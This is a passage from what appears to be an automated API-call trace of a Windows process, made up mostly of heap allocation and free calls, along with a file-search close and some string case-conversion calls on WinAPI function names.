cFileName="gOxwTO2-sZ.mp4", cAlternateFileName="GOXWTO~1.MP4")) returned 0x41ac140 [0098.952] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0098.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0098.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0098.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0098.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0098.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0098.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f88 [0098.952] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0098.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f88 | out: hHeap=0x1780000) returned 1 [0098.952] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0098.952] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2420 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0098.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c20 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0098.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e48 | out: hHeap=0x1780000) returned 1 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0098.953] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0098.953] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0098.953] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0098.954] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0098.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0098.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24e0 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0098.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e48 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2460 [0098.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0098.954] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c38 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0098.954] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0098.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0098.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2360 [0098.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2360 | out: hHeap=0x1780000) returned 1 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0098.955] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0098.955] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0098.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0098.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0098.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0098.956] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0098.956] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0098.956] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0098.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0098.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0098.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0098.957] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0098.957] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0098.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0098.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0098.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0098.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0098.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0098.958] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0098.958] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0098.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0098.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0098.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0098.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0098.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0098.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0098.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0098.959] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0098.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0098.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0098.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0098.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0098.960] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0098.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0098.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0098.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0098.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0098.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0098.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0098.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0098.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0098.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0098.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0098.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0098.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0098.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0098.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0098.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0098.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0098.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0098.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0098.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0098.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0098.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0098.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0098.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0098.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0098.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0098.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0098.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0098.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0098.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0098.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0098.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0098.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0098.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0098.962] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0098.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0098.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0098.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0098.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0098.962] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0098.963] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0098.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0098.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0098.965] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0098.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0098.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0098.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0098.965] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.966] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0098.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0098.966] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0098.966] HeapFree (in: hHeap=0x1780000, 